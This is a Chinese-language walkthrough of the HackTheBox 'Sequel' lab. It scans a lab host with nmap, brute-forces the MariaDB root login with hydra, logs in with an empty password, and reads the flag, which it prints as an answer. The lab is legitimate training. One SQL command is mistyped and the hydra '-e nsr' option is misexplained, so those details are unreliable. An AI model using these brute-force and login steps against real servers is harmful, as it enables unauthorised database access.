前言

第一层 Sequel

依旧是SQL

Task1

During our scan, which port do we find serving MySQL?
在扫描过程中，我们发现哪个端口为 MySQL 提供服务？

A：3306

nmap开扫

nmap -A -Pn -T4 10.129.95.232

• -T4 表示设置扫描速度为T4级别

这也是mysql的默认开放端口

Task2

What community-developed MySQL version is the target running?
目标运行的是哪个社区开发的MySQL版本？

A：MariaDB

由上面的扫描结果中的mysql-info可知

Task3

When using the MySQL command line client, what switch do we need to use in order to specify a login username?
使用 MySQL 命令行客户端时，我们需要使用什么开关来指定登录用户名？

A：-u

查看帮助

mysql --help

Task4

Which username allows us to log into this MariaDB instance without providing a password?
哪个用户名允许我们在不提供密码的情况下登录此MariaDB实例？

A：root

使用hydra工具对root用户的密码进行爆破

hydra -l root -e nsr mysql://10.129.95.232

• -l root是Hydra的选项之一，表示要尝试使用”root”作为用户名进行破解

• -e nsr是Hydra的选项之一，表示使用”nsr”作为密码列表中的默认密码，如果破解其他密码可以把 -e nsr 换成字典路径即可

最后爆破的结果是密码为空

Task5

In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?
在 SQL 中，我们可以使用什么符号在查询中指定要显示表内的所有内容？

A：*

Task6

In SQL, what symbol do we need to end each query with?
在 SQL 中，我们需要用什么符号来结束每个查询？

A：;

Task7

There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that's unique to this host?
此 MySQL 实例中有三个数据库，它们在所有 MySQL 实例中都是通用的。这个主机独有的第四个名字是什么？

A：htb

先连上靶机的mysql服务

mysql -u root -h 10.129.95.232

然后查看数据库

show database;

下面三个是通用的数据库

Submit Flag

先选择要使用的数据库

use htb;

然后查询表名

show tables;

最后查询config表中的内容

select * from config;

得到flag：7b4bec00d1a39e3dd4e021ec3d915da8